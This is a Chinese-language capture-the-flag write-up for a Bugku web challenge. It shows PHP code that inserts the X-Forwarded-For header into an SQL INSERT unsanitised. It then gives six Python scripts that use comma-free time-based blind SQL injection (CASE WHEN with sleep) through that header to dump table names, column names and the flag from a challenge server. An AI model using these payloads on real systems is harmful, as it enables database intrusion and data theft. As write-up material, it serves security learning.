bugku-Web-INSERT INTO注入(case注入技巧(逗号被过滤的延迟盲注)+延迟注入脚本)
flag格式:flag{xxxxxxxxxxxx}
不如写个Python吧
error_reporting(0);
function getIp(){
$ip = '';
if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}else{
$ip = $_SERVER['REMOTE_ADDR'];
}
$ip_arr = explode(',', $ip);
return $ip_arr[0];
}
$host="localhost";
$user="";
$pass="";
$db="";
$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");
mysql_select_db($db) or die("Unable to select database");
$ip = getIp();
echo 'your ip is :'.$ip;
$sql="insert into client_ip (ip) values ('$ip')";
mysql_query($sql);
很明显,ip由xff头或者Remote-addr得来,然后在insert into语句中对这个ip进行查询,我们可以把注入语句加到这个ip中来进行注入。
尝试了报错盲注,没有回显,也试了bool盲注,发现length(database())的值不管设成多少页面都不报错。
最后就剩延时盲注了,简单判断下库长,发现有延时反应,且可判断出库长为5。
上面代码中的ip是被过滤掉逗号的,所以我们延时盲注时不能用if语句。
只能用case when then代替,其余的部分和if延时盲注一样,下面给出脚本:(mysql不分大小写)
1、爆联合表长(有了库长,且库名可用database()代替,不再爆库名了,想爆可以自己去爆:web15)
import requests
dic = '0123456789abcdefghijklmnopqrstuvwxyz_'
url = 'http://123.206.87.240:8002/web15/'
xff = "'+(select case when(substr((select group_concat(table_name separator '@') from information_schema.tables where table_schema=database()) from {0} for 1)='')then sleep(4) else 1 end) + '1"
for i in range(1, 30):
try:
headers = {'x-forwarded-for':xff.format(i)}
r = requests.get(url, headers=headers, timeout = 3)
except requests.exceptions.ReadTimeout:
print(i)
break结果为15,所以联合表长为14
2、爆联合表名
import requests
dic = '0123456789abcdefghijklmnopqrstuvwxyz_@'
url = 'http://123.206.87.240:8002/web15/'
xff = "'+(select case when(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()) from {0} for 1)='{1}')then sleep(4) else 1 end) + '1"
table = ''
for i in range(1, 15):
for j in dic:
try:
headers = {'x-forwarded-for':xff.format(i, j)}
r = requests.get(url, headers=headers, timeout = 3)
except requests.exceptions.ReadTimeout:
table += j
print(table)
print(table)结果为:client_ip@flag
3、爆联合列长
import requests
dic = '0123456789abcdefghijklmnopqrstuvwxyz_'
url = 'http://123.206.87.240:8002/web15/'
xff = "'+(select case when(substr((select group_concat(column_name separator '@') from information_schema.columns where table_name='flag') from {0} for 1)='')then sleep(4) else 1 end) + '1"
for i in range(1, 30):
try:
headers = {'x-forwarded-for':xff.format(i)}
r = requests.get(url, headers=headers, timeout = 3)
except requests.exceptions.ReadTimeout:
print(i)
break得到列长为4
4、爆联合列名
import requests
dic = '0123456789abcdefghijklmnopqrstuvwxyz_@'
url = 'http://123.206.87.240:8002/web15/'
xff = "'+(select case when(substr((select group_concat(column_name separator '@') from information_schema.columns where table_name='flag') from {0} for 1)='{1}')then sleep(4) else 1 end) + '1"
column = ''
for i in range(1, 5):
for j in dic:
try:
headers = {'x-forwarded-for':xff.format(i, j)}
r = requests.get(url, headers=headers, timeout = 3)
except requests.exceptions.ReadTimeout:
column += j
print(column)
print(column)只有一列,列名为flag。
5、爆内容长度
import requests
dic = '0123456789abcdefghijklmnopqrstuvwxyz_'
url = 'http://123.206.87.240:8002/web15/'
xff = "'+(select case when(substr((select flag from flag) from {0} for 1)='')then sleep(4) else 1 end) + '1"
for i in range(1, 50):
try:
headers = {'x-forwarded-for':xff.format(i)}
r = requests.get(url, headers=headers, timeout = 3)
print(i)
except requests.exceptions.ReadTimeout:
print(i)
break得内容长度为32
6、爆内容(即flag)
import requests
dic = '0123456789abcdefghijklmnopqrstuvwxyz_'
url = 'http://123.206.87.240:8002/web15/'
xff = "'+(select case when(substr((select flag from flag) from {0} for 1)='{1}')then sleep(4) else 1 end) + '1"
dump = ''
for i in range(1, 33):
for j in dic:
try:
headers = {'x-forwarded-for':xff.format(i, j)}
r = requests.get(url, headers=headers, timeout = 3)
except requests.exceptions.ReadTimeout:
dump += j
print(dump)
print(dump)得出:cdbf14c9551d5be5612f7bb5d2867853